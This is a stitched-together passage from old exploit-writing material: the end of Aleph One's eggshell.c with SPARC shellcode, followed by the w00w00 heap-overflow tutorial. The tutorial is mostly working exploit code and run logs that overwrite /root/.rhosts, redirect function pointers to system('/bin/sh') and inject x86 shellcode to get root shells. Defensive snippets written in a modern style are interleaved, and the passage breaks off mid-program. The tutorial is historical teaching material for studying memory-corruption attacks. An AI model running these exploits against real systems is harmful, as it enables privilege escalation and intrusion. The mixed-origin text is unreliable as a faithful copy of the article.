nop[]="\xac\x15\xa1\x6e"; char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; unsigned long get_sp(void) { __asm__("or %sp, %sp, %i0"); } #elif defined(__sparc__) && defined(__sun__) #define NOP_SIZE 4 char nop[]="\xac\x15\xa1\x6e"; char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff" "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01"; unsigned long get_sp(void) { __asm__("or %sp, %sp, %i0"); } #endif ------------------------------------------------------------------------------ eggshell.c ------------------------------------------------------------------------------ /* * eggshell v1.0 * * Aleph One / aleph1@underground.org */ #include #include #include "shellcode.h" #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 void usage(void); void main(int argc, char *argv[]) { char *ptr, *bof, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE; while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF) switch (c) { case 'a': align = atoi(optarg); break; case 'b': bsize = atoi(optarg); break; case 'e': eggsize = atoi(optarg); break; case 'o': offset = atoi(optarg); break; case '?': usage(); exit(0); } if (strlen(shellcode) > eggsize) { printf("Shellcode is larger the the egg.\n"); exit(0); } if (!(bof = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n", bsize, eggsize, align); printf("[ 
Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset); addr_ptr = (long *) bof; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE) for (n = 0; n < NOP_SIZE; n++) { m = (n + align) % NOP_SIZE; *(ptr++) = nop[m]; } for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; bof[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(bof,"BOF=",4); putenv(bof); system("/bin/sh"); } void usage(void) { (void)fprintf(stderr, "usage: eggshell [-a ] [-b ] [-e ] [-o ]\n"); } ------------------------------------------------------------------------------
 

Article 3

Subject: w00w00 on Heap Overflows

This is a PRELIMINARY BETA VERSION of our final article! We apologize for
any mistakes.  We still need to add a few more things.

[ Note: You may also get this article off of ]
[ http://www.w00w00.org/articles.html.       ]

w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team

------------------------------------------------------------------------------
Copyright (C) January 1999, Matt Conover & w00w00 Security Development

You may freely redistribute or republish this article, provided the
following conditions are met:

1. This article is left intact (no changes made, the full article
   published, etc.)

2. Proper credit is given to its authors; Matt Conover (Shok) and the 
   w00w00 Security Development (WSD).

You are free to rewrite your own articles based on this material (assuming
the above conditions are met). It'd also be appreciated if an e-mail is
sent to either mattc@repsec.com or shok@dataforce.net to let us know you
are going to be republishing this article or writing an article based upon
one of our ideas.

------------------------------------------------------------------------------

Prelude:
  Heap/BSS-based overflows are fairly common in applications today; yet,
  they are rarely reported.  Therefore, we felt it was appropriate to
  present a "heap overflow" tutorial.  The biggest critics of this article
  will probably be those who argue heap overflows have been around for a
  while.  Of course they have, but that doesn't negate the need for such
  material.

  In this article, we will refer to "overflows involving the stack" as
  "stack-based overflows" ("stack overflow" is misleading) and "overflows
  involving the heap" as "heap-based overflows".

  This article should provide the following: a better understanding
  of heap-based overflows along with several methods of exploitation,
  demonstrations, and some possible solutions/fixes.  Prerequisites to
  this article: a general understanding of computer architecture, 
  assembly, C, and stack overflows.
			
  This is a collection of the insights we have gained through our research
  with heap-based overflows and the like.  We have written all the
  examples and exploits included in this article; therefore, the copyright
  applies to them as well.
  

Why Heap/BSS Overflows are Significant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 As more system vendors add non-executable stack patches, or individuals 
 apply their own patches (e.g., Solar Designer's non-executable stack
 patch), a different method of penetration is needed by security
 consultants (or else, we won't have jobs!).  Let me give you a few
 examples:

   1. Searching for the word "heap" on BugTraq (for the archive, see
      www.geek-girl.com/bugtraq), yields only 40+ matches, whereas
      "stack" yields 2300+ matches (though several are irrelevant).  Also,
      "stack overflow" gives twice as many matches as "heap" does.

   2. As of Solaris 2.6, SPARC Solaris (an OS developed by Sun
      Microsystems) includes a "protect_stack" option, but not an
      equivalent "protect_heap" option.  Fortunately, the bss is not
      executable (and need not be).

   3. There is a "StackGuard" (developed by Crispin Cowan et al.), but
      no equivalent "HeapGuard".

   4. Using a heap/bss-based overflow was one of the "potential" methods
      of getting around StackGuard.  The following was posted to BugTraq
      by Tim Newsham several months ago:

        > Finally the precomputed canary values may be a target
        > themselves.  If there is an overflow in the data or bss segments
        > preceding the precomputed canary vector, an attacker can simply
        > overwrite all the canary values with a single value of his
        > choosing, effectively turning off stack protection.

   5. Some people have actually suggested making a "local" buffer a
      "static" buffer, as a fix!  This is not very wise; yet, it is a
      fairly common misconception of how the heap or bss work.
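
 To illustrate item 5: moving a buffer from the stack to static storage
 only changes where the overflow lands.  What actually prevents the
 overflow is a length check before the copy.  The following is a minimal
 sketch under assumed names (store_name() and NAME_MAX_LEN are
 hypothetical and not from the article):

```c
#include <assert.h>
#include <string.h>

#define NAME_MAX_LEN 16   /* illustrative size, not from the article */

/*
 * Hypothetical helper: copy 'src' into a static buffer with an explicit
 * length check.  Returns a pointer to the buffer on success, or NULL if
 * 'src' (plus its terminating '\0') would not fit.
 */
const char *store_name(const char *src)
{
   static char name[NAME_MAX_LEN];   /* lives in the bss, not on the stack */

   assert(src != NULL);
   if (strlen(src) >= sizeof(name))
      return NULL;                   /* reject rather than overflow */

   memcpy(name, src, strlen(src) + 1);
   return name;
}
```

 Without the strlen() test, the static buffer would be overrun exactly as
 a local one would be; only the neighbouring data differs.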

 Although heap-based overflows are not new, they don't seem to be well
 understood.

 Note:
   One argument is that the presentation of a "heap-based overflow" is
   equivalent to a "stack-based overflow" presentation.  However, only a
   small portion of this article overlaps with what a "stack-based
   overflow" presentation would cover.

 People go out of their way to prevent stack-based overflows, but leave
 their heap and bss completely open!  On most systems, the heap and bss
 are both executable and writeable (an excellent combination).  This makes
 heap/bss overflows very possible.  But, I don't see any reason for the
 bss to be executable!  What is going to be executed in zero-filled
 memory?!

 For security consultants (the ones doing the penetration assessment),
 most heap-based overflows are system and architecture independent,
 including those with non-executable heaps.  This will all be demonstrated
 in the "Exploiting Heap/BSS Overflows" section.

Terminology
~~~~~~~~~~~
 An executable file, such as an ELF (Executable and Linking Format)
 executable, has several "sections" in the executable file, such as: the
 PLT (Procedure Linking Table), GOT (Global Offset Table), init 
 (instructions executed on initialization), fini (instructions to be 
 executed upon termination), and ctors and dtors (which contain global 
 constructors/destructors).


"Memory that is dynamically allocated by the application is known as the
heap." The words "by the application" are important here, as on good
systems most areas are in fact dynamically allocated at the kernel level,
while for the heap, the allocation is requested by the application.

Heap and Data/BSS Sections
~~~~~~~~~~~~~~~~~~~~~~~~~~
 The heap is an area in memory that is dynamically allocated by the
 application.  The data section is initialized at compile-time.

 The bss section contains uninitialized data, and is allocated at
 run-time.  Until it is written to, it remains zeroed (or at least from
 the application's point-of-view).

 Note:
   When we refer to a "heap-based overflow" in the sections below, we are
   most likely referring to buffer overflows of both the heap and data/bss
   sections.
									
 On most systems, the heap grows up (towards higher addresses).  Hence,
 when we say "X is below Y," it means X is lower in memory than Y.
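
 The three kinds of storage described above can be told apart in a short
 C sketch.  The names below (data_buf, bss_buf, all_zero(), heap_buf_new())
 are hypothetical and exist only for this illustration; where each object
 actually ends up is decided by the compiler and linker, so treat the
 section comments as the usual case and not a guarantee.

```c
#include <assert.h>
#include <stdlib.h>

#define DEMO_SIZE 32   /* illustrative size */

char data_buf[DEMO_SIZE] = "initialized";   /* data section: has an initial value */
char bss_buf[DEMO_SIZE];                     /* bss: no initializer, starts zeroed */

/* Returns 1 if the first 'len' bytes of 'p' are all zero, else 0. */
int all_zero(const char *p, size_t len)
{
   size_t i;

   assert(p != NULL);
   for (i = 0; i < len; i++)
      if (p[i] != 0)
         return 0;
   return 1;
}

/* Returns a zero-filled heap buffer of 'len' bytes, or NULL on failure. */
char *heap_buf_new(size_t len)
{
   return calloc(len, 1);   /* heap: requested by the application at run-time */
}
```

 Printing the three addresses with "%p" on a given system is a quick way to
 see how the sections are laid out relative to each other.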


Exploiting Heap/BSS Overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 In this section, we'll cover several different methods to put heap/bss
 overflows to use.  Most of the examples for Unix-derived x86 systems will
 also work in DOS and Windows (with a few changes).  We've also included 
 a few DOS/Windows specific exploitation methods.  An advance warning:
 this will be the longest section, and should be studied the most.

 Note:
   In this article, I use the "exact offset" approach.  The offset
   must be closely approximated to its actual value.  The alternative is
   the "stack-based overflow approach" (if you will), where one repeats
   the addresses to increase the likelihood of a successful exploit.

 While this example may seem unnecessary, we're including this quick
 demonstration for those who are unfamiliar with heap-based overflows:
 -----------------------------------------------------------------------------
   /* demonstrates dynamic overflow in heap (initialized data) */

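   #include <stdio.h>      /* printf() */
   #include <stdlib.h>     /* malloc() */
   #include <string.h>     /* memset() */
   #include <sys/types.h>  /* u_long, u_int */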

   #define BUFSIZE 16
   #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

   int main()
   {
      u_long diff;
      char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

      diff = (u_long)buf2 - (u_long)buf1;
      printf("buf1 = %p, buf2 = %p, diff = 0x%lx bytes\n",
             (void *)buf1, (void *)buf2, diff);

      memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';

      printf("before overflow: buf2 = %s\n", buf2);
      memset(buf1, 'B', (u_int)(diff + OVERSIZE));
      printf("after overflow: buf2 = %s\n", buf2);

      return 0;
   }
 -----------------------------------------------------------------------------

 If we run this, we'll get the following:
   [root /w00w00/heap/examples/basic]# ./heap1 8
   buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
   before overflow: buf2 = AAAAAAAAAAAAAAA
   after overflow: buf2 = BBBBBBBBAAAAAAA

 This works because buf1 overruns its boundaries into buf2's heap space.
 But, because buf2's heap space is still valid (heap) memory, the program
 doesn't crash. 

 Note:
   A possible fix for a heap-based overflow, which will be mentioned
   later, is to put "canary" values (like those of StackGuard, mentioned
   later) between all variables on the heap; these values mustn't change
   throughout execution.
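
 The canary idea in the note above can be sketched in a few lines of C.
 This is a hedged illustration only: guarded_alloc(), guarded_check(), and
 the CANARY constant are hypothetical names, and the fixed constant is used
 purely for readability (a predictable value offers little protection, so
 a real scheme would need an unpredictable one).

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define CANARY 0x5AA5C33CUL   /* arbitrary illustrative value */

/* Allocate 'len' usable bytes followed by a canary word. */
char *guarded_alloc(size_t len)
{
   unsigned long canary = CANARY;
   char *p = malloc(len + sizeof(canary));

   if (p != NULL)
      memcpy(p + len, &canary, sizeof(canary));   /* may be unaligned */
   return p;
}

/* Returns 1 if the canary after 'len' bytes is intact, 0 if overwritten. */
int guarded_check(const char *p, size_t len)
{
   unsigned long canary = CANARY;

   assert(p != NULL);
   return memcmp(p + len, &canary, sizeof(canary)) == 0;
}
```

 A program would call guarded_check() before trusting or freeing the
 buffer, and abort if it returns 0, since a changed canary means something
 wrote past the end of the usable area.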

 You can get the complete source to all examples used in this article,
 from the file attachment, heaptut.tgz.  You can also download this from
 our article archive at http://www.w00w00.org/articles.html.

 Note:
   To demonstrate a bss-based overflow, change the line
   'char *buf = malloc(BUFSIZE)' to 'static char buf[BUFSIZE]'.

 Yes, that was a very basic example, but we wanted to demonstrate a heap
 overflow at its most primitive level.  This is the basis of almost
 all heap-based overflows.  We can use it to overwrite a filename, a
 password, a saved uid, etc.  Here is a (still primitive) example of 
 manipulating pointers:
 -----------------------------------------------------------------------------
   /* demonstrates static pointer overflow in bss (uninitialized data) */

   #include <stdio.h>      /* printf() */
   #include <string.h>     /* memset() */
   #include <sys/types.h>  /* u_long, u_int */

   #define BUFSIZE 16
   #define ADDRLEN 4 /* # of bytes in an address */

   int main()
   {
      u_long diff;
      static char buf[BUFSIZE], *bufptr;

      bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

      printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
             &bufptr, bufptr, buf, diff, diff);

      memset(buf, 'A', (u_int)(diff + ADDRLEN));

      printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", 
             &bufptr, bufptr, buf, diff, diff);

      return 0;
   }
 -----------------------------------------------------------------------------

 The results:
   [root /w00w00/heap/examples/basic]# ./heap3
   bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
   bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes
 
 When run, one clearly sees that the pointer now points to a different
 address.  Uses of this?  One example is that we could overwrite a 
 temporary filename pointer to point to a separate string (such as
 argv[1], which we could supply ourselves), which could contain
 "/root/.rhosts".  Hopefully, you are starting to see some potential uses.

 To demonstrate this, we will use a temporary file to momentarily save
 some input from the user. This is our finished "vulnerable program":
 -----------------------------------------------------------------------------
   /*
    * This is a typical vulnerable program.  It will store user input in a
    * temporary file.
    *
    * Compile as: gcc -o vulprog1 vulprog1.c
    */

   #include 
   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 16

   /*
    * Run this vulprog as root or change the "vulfile" to something else.
    * Otherwise, even if the exploit works, it won't have permission to
    * overwrite /root/.rhosts (the default "example").
    */

   int main(int argc, char **argv)
   {
      FILE *tmpfd;
      static char buf[BUFSIZE], *tmpfile;

      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s \n", argv[0]);
         exit(ERROR);
      }

      tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
      printf("before: tmpfile = %s\n", tmpfile);

      printf("Enter one line of data to put in %s: ", tmpfile);
      gets(buf);

      printf("\nafter: tmpfile = %s\n", tmpfile);

      tmpfd = fopen(tmpfile, "w");
      if (tmpfd == NULL)
      {
         fprintf(stderr, "error opening %s: %s\n", tmpfile, 
                 strerror(errno));

         exit(ERROR);
      }

      fputs(buf, tmpfd);
      fclose(tmpfd);
   }

 -----------------------------------------------------------------------------

 The aim of this "example" program is to demonstrate that something of 
 this nature can easily occur in programs (although hopefully not setuid
 or root-owned daemon servers).

 And here is our exploit for the vulnerable program:
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * This will exploit vulprog1.c.  It passes some arguments to the
    * program (that the vulnerable program doesn't use).  The vulnerable
    * program expects us to enter one line of input to be stored
    * temporarily.  However, because of a static buffer overflow, we can
    * overwrite the temporary filename pointer, to have it point to
    * argv[1] (which we could pass as "/root/.rhosts").  Then it will
    * write our temporary line to this file.  So our overflow string (what
    * we pass as our input line) will be: 
    *   + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
    *
    * We use "+ +" (all hosts), followed by '#' (comment indicator), to
    * prevent our "attack code" from causing problems.  Without the 
    * "#", programs using .rhosts would misinterpret our attack code.
    *
    * Compile as: gcc -o exploit1 exploit1.c
    */

   #include 
   #include 
   #include 
   #include 

   #define BUFSIZE 256

   #define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */

   #define VULPROG "./vulprog1"
   #define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

   /* get value of sp off the stack (used to calculate argv[1] address) */
   u_long getesp()
   {
      __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
   }

   int main(int argc, char **argv)
   {
      u_long addr;

      register int i;
      int mainbufsize;

      char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

      /* ------------------------------------------------------ */
      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s  [try 310-330]\n", argv[0]);
         exit(ERROR);
      }
      /* ------------------------------------------------------ */

      memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");

      memset(buf + strlen(buf), 'A', DIFF);
      addr = getesp() + atoi(argv[1]);

      /* reverse byte order (on a little endian system) */
      for (i = 0; i < sizeof(u_long); i++)
         buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

      mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;

      mainbuf = (char *)malloc(mainbufsize);
      memset(mainbuf, 0, sizeof(mainbuf));

      snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
               buf, VULPROG, VULFILE);

      printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
             addr, VULFILE);

      system(mainbuf);
      return 0;      
   }

 -----------------------------------------------------------------------------

 Here's what happens when we run it:
   [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
   Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after.

   before: tmpfile = /tmp/vulprog.tmp
   Enter one line of data to put in /tmp/vulprog.tmp:
   after: tmpfile = /vulprog1

 Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are
 close:
   [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
   Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after.

   before: tmpfile = /tmp/vulprog.tmp
   Enter one line of data to put in /tmp/vulprog.tmp:
   after: tmpfile = /root/.rhosts
   [root /tmp/heap/examples/advanced/vul-pkg1]#

 Got it!  The exploit overwrites the buffer that the vulnerable program
 uses for gets() input.  At the end of its buffer, it places the address
 of where we assume argv[1] of the vulnerable program is.  That is, we
 overwrite everything between the overflowed buffer and the tmpfile
 pointer.  We ascertained the tmpfile pointer's location in memory by
 sending arbitrary lengths of "A"'s until we discovered how many "A"'s it
 took to reach the start of tmpfile's address.  If you have the source
 to the vulnerable program, you can also add a "printf()" to print out
 the addresses/offsets between the overflowed data and the target data
 (i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').

 (Un)fortunately, the offsets usually change at compile-time (as far as
 I know), but we can easily recalculate, guess, or "brute force" the
 offsets.

 Note:
   Now that we need a valid address (argv[1]'s address), we must reverse
   the byte order for little endian systems.  Little endian systems
   store the least significant byte first (x86 is little endian), so
   0x12345678 is stored in memory as the bytes 0x78 0x56 0x34 0x12.  On
   a big endian system (such as a sparc), we could leave the addresses
   alone and drop the code that reverses the byte order.
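
   The byte-order point can be checked with a small sketch.  The helper
   names store_le32() and store_be32() are hypothetical; they simply
   write a 32-bit value into a byte array in each order so the two
   layouts can be compared on any machine.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Write the low 32 bits of 'value' into out[0..3], least significant
 * byte first (the layout a little endian CPU such as x86 uses).
 */
void store_le32(unsigned char *out, unsigned long value)
{
   size_t i;

   assert(out != NULL);
   for (i = 0; i < 4; i++)
      out[i] = (unsigned char)((value >> (i * 8)) & 0xff);
}

/*
 * Write the low 32 bits of 'value' into out[0..3], most significant
 * byte first (the layout a big endian CPU such as sparc uses).
 */
void store_be32(unsigned char *out, unsigned long value)
{
   size_t i;

   assert(out != NULL);
   for (i = 0; i < 4; i++)
      out[i] = (unsigned char)((value >> ((3 - i) * 8)) & 0xff);
}
```

   For 0x12345678, store_le32() yields the bytes 78 56 34 12 and
   store_be32() yields 12 34 56 78.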

 Further note: 
   So far none of these examples required an executable heap! As I
   briefly mentioned in the "Why Heap/BSS Overflows are Significant"
   section, these (with the exception of the address byte order) previous
   examples were all system/architecture independent. This is useful in
   exploiting heap-based overflows.

 With knowledge of how to overwrite pointers, we're going to show how to
 modify function pointers.  The downside to exploiting function pointers
 (and the others to follow) is that they require an executable heap.

 A function pointer (e.g., "int (*funcptr)(char *str)") allows a
 programmer to choose at run-time which function is called.  We can
 overwrite a function pointer by overwriting its address, so that when
 it's executed, it calls the function we point it to instead.  This is
 good news because there are several options we have.  First, we
 can include our own shellcode.  We can do one of the following with
 shellcode: 

   1. argv[] method: store the shellcode in an argument to the program
      (requiring an executable stack)

   2. heap offset method: offset from the top of the heap to the
      estimated address of the target/overflow buffer (requiring an
      executable heap)

 Note: There is a greater probability of the heap being executable than
 the stack on any given system.  Therefore, the heap method will probably
 work more often.

 A second method is to simply guess (though it's inefficient) the address
 of a function, using its estimated offset in the vulnerable program.
 Also, if we know the address of system() in our program, it will be at
 a very close offset in the vulnerable program, assuming both
 vulprog/exploit were compiled the same way.  The advantage is that no
 executable stack or heap is required.

 Note:
   Another method is to use the PLT (Procedure Linkage Table), through
   which calls to shared-library functions are routed.  I first learned
   the PLT method from str (stranJer) in a non-executable stack exploit
   for sparc.

 The reason the second method is preferred is simplicity.  We can guess
 the offset of system() in the vulprog from the address of system() in
 our exploit fairly quickly.  The same holds on remote systems (assuming
 similar versions, operating systems, and architectures).  With the
 argv[] (stack) method, the advantage is that we can do whatever we
 want, and we don't require compatible function pointers (i.e., char
 (*funcptr)(int a) and void (*funcptr)() would work the same).  The
 disadvantage (as mentioned earlier) is that it requires an executable
 stack.

 Here is our vulnerable program for the following 2 exploits:
 -----------------------------------------------------------------------------
   /* 
    * Just the vulnerable program we will exploit.
    * Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
    */

   #include <stdio.h>
   #include <stdlib.h>
   #include <unistd.h>
   #include <string.h>

   #define ERROR -1
   #define BUFSIZE 64

   int goodfunc(const char *str); /* funcptr starts out as this */

   int main(int argc, char **argv)
   {
      static char buf[BUFSIZE];
      static int (*funcptr)(const char *str);

      if (argc <= 2)
      {
         fprintf(stderr, "Usage: %s <buffer> <goodfunc's arg>\n", argv[0]);
         exit(ERROR);
      }

      printf("(for 1st exploit) system() = %p\n", system);
      printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
      printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);

      funcptr = (int (*)(const char *str))goodfunc;
      printf("before overflow: funcptr points to %p\n", funcptr);

      memset(buf, 0, sizeof(buf));
      strncpy(buf, argv[1], strlen(argv[1]));
      printf("after overflow: funcptr points to %p\n", funcptr);

      (void)(*funcptr)(argv[2]);
      return 0;
   }

   /* ---------------------------------------------- */

   /* This is what funcptr would point to if we didn't overflow it */
   int goodfunc(const char *str)
   {
      printf("\nHi, I'm a good function.  I was passed: %s\n", str);
      return 0;
   }
 -----------------------------------------------------------------------------

 Our first example is the system() method:
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * Demonstrates overflowing/manipulating static function pointers in
    * the bss (uninitialized data) to execute functions.
    *
    * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best)
    * To compile use: gcc -o exploit1 exploit1.c
    */

   #include 
   #include 
   #include 
   #include 

   #define BUFSIZE 64 /* the estimated diff between funcptr/buf */

   #define VULPROG "./vulprog" /* vulnerable program location */
   #define CMD "/bin/sh" /* command to execute if successful */

   #define ERROR -1

   int main(int argc, char **argv)
   {
      register int i;
      u_long sysaddr;
      static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s \n", argv[0]);
         fprintf(stderr, "[offset = estimated system() offset]\n\n");

         exit(ERROR);
      }

      sysaddr = (u_long)&system - atoi(argv[1]);
      printf("trying system() at 0x%lx\n", sysaddr);

      memset(buf, 'A', BUFSIZE);

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(sysaddr); i++)
         buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

      execl(VULPROG, VULPROG, buf, CMD, NULL);
      return 0;
   }
 -----------------------------------------------------------------------------

 When we run this with an offset of 16 (which may vary) we get:
   [root /w00w00/heap/examples]# ./exploit1 16
   trying system() at 0x80484d0
   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd3c
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0x80484d0
   bash#

 And our second example, using both argv[] and heap offset method:
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * This demonstrates how to exploit a static buffer to point the
    * function pointer at argv[] to execute shellcode.  This requires
    * an executable heap to succeed.
    *
    * The exploit takes two argumenst (the offset and "heap"/"stack").  
    * For argv[] method, it's an estimated offset to argv[2] from 
    * the stack top.  For the heap offset method, it's an estimated offset
    * to the target/overflow buffer from the heap top.
    *
    * Try values somewhere between 325-345 for argv[] method, and 420-450
    * for heap.
    *
    * To compile use: gcc -o exploit2 exploit2.c
    */

   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 64 /* estimated diff between buf/funcptr */

   #define VULPROG "./vulprog" /* where the vulprog is */

   char shellcode[] = /* just aleph1's old shellcode (linux x86) */
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
     "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
     "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

   u_long getesp()
   {
      __asm__("movl %esp,%eax"); /* set sp as return value */
   }

   int main(int argc, char **argv)
   {
      register int i;
      u_long sysaddr;
      char buf[BUFSIZE + sizeof(u_long) + 1];

      if (argc <= 2)
      {
         fprintf(stderr, "Usage: %s  \n", argv[0]);
         exit(ERROR);
      }

      if (strncmp(argv[2], "stack", 5) == 0)
      {
         printf("Using stack for shellcode (requires exec. stack)\n");

         sysaddr = getesp() + atoi(argv[1]);
         printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);

         memset(buf, 'A', BUFSIZE + sizeof(u_long));
      }

      else
      {
         printf("Using heap buffer for shellcode "
                "(requires exec. heap)\n");

         sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
         printf("Using 0x%lx as our buffer's address\n\n", sysaddr);

         if (BUFSIZE + 4 + 1 < strlen(shellcode))
         {
            fprintf(stderr, "error: buffer is too small for shellcode "
                            "(min. = %d bytes)\n", strlen(shellcode));

            exit(ERROR);
         }

         strcpy(buf, shellcode);
         memset(buf + strlen(shellcode), 'A',
                BUFSIZE - strlen(shellcode) + sizeof(u_long));
      }

      buf[BUFSIZE + sizeof(u_long)] = '\0';

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(sysaddr); i++)
         buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

      execl(VULPROG, VULPROG, buf, shellcode, NULL);
      return 0;
   }
 -----------------------------------------------------------------------------

 When we run this with an offset of 334 for the argv[] method we get:
   [root /w00w00/heap/examples] ./exploit2 334 stack
   Using stack for shellcode (requires exec. stack)
   Using 0xbffffd16 as our argv[1] address

   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd16
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0xbffffd16
   bash#

 When we run this with an offset of 428-442 for the heap offset method we get:
   [root /w00w00/heap/examples] ./exploit2 428 heap
   Using heap buffer for shellcode (requires exec. heap)
   Using 0x804a9a8 as our buffer's address

   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd16
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0x804a9a8
   bash#

 Note: 
   Another advantage to the heap method is that you have a large
   working range. With argv[] (stack) method, it needed to be exact.  With
   the heap offset method, any offset between 428-442 worked.

 As you can see, there are several different methods to exploit the same
 problem.  As an added bonus, we'll include a final type of exploitation
 that uses jmp_bufs (setjmp/longjmp).  A jmp_buf basically stores a stack
 frame (the saved registers), and longjmp() jumps back to it at a later
 point in execution.  If we get a chance to overflow a buffer between
 setjmp() and longjmp(), and the jmp_buf is above the overflowed buffer
 in memory, this can be exploited.  We can set these up to emulate the
 behavior of a stack-based overflow (as does the argv[] shellcode method
 used earlier).  The jmp_buf layout used here is for an x86 system; it
 will need to be modified accordingly for other architectures.

 First we will include a vulnerable program again:
 -----------------------------------------------------------------------------
   /*
    * This is just a basic vulnerable program to demonstrate
    * how to overwrite/modify jmp_buf's to modify the course of
    * execution.
    */

   #include <stdio.h>
   #include <stdlib.h>
   #include <unistd.h>
   #include <string.h>
   #include <setjmp.h>

   #define ERROR -1
   #define BUFSIZE 16

   static char buf[BUFSIZE];
   jmp_buf jmpbuf;

   u_long getesp()
   {
   __asm__("movl %esp,%eax"); /* the return value goes in %eax */
   }

   int main(int argc, char **argv)
   {
      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s <string1> <string2>\n", argv[0]);
         exit(ERROR);
      }

      printf("[vulprog] argv[2] = %p\n", argv[2]);
